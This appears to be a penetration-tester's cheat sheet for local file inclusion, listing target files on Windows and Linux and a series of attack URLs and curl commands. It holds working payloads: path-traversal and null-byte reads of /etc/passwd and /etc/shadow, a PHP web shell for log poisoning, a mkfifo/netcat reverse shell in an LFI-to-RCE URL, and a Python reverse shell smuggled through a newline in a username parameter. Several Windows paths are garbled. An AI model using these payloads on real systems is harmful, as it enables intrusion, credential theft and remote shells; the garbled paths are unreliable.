LFI
LFI Windows Files:
%SYSTEMROOT%repairsystem
%SYSTEMROOT%repairSAM
%SYSTEMROOT%repairSAM
%WINDIR%win.ini
%SYSTEMDRIVE%boot.ini
%WINDIR%Panthersysprep.inf
%WINDIR%system32congAppEvent.Evt
LFI Linux Files:
/etc/issue
/proc/version
/etc/prole
/etc/passwd
/etc/passwd
/etc/shadow
h t t p:// $ i p / i n d e x.p h p ? p a g e = / e t c / p a s s w d
:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f,
Contaminating Log Files <?php echo shell_exec($_GET['cmd']);?>
http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
curl http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/apache2/.htpasswd
192.168.0.23/admin.php?username=%0A/bin/cat/etc/passwd
192.168.0.23/admin.php?username=%0A/bin/cat/home/silky/flag.txt
username=%0A/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.23",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
curl -d "image=/etc/passwd" https://ip:15020/blog/download.php -k
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://ip/administrator/alerts/alertConfigField.php
http://192.168.1.145/index.php?page=../../../../../../../../../etc/passwd%00
text_file_name=ssp%2F../../../../../../../../../../etc/passwd&B=Display+FileLFI
LFI to RCE
Last updated
Was this helpful?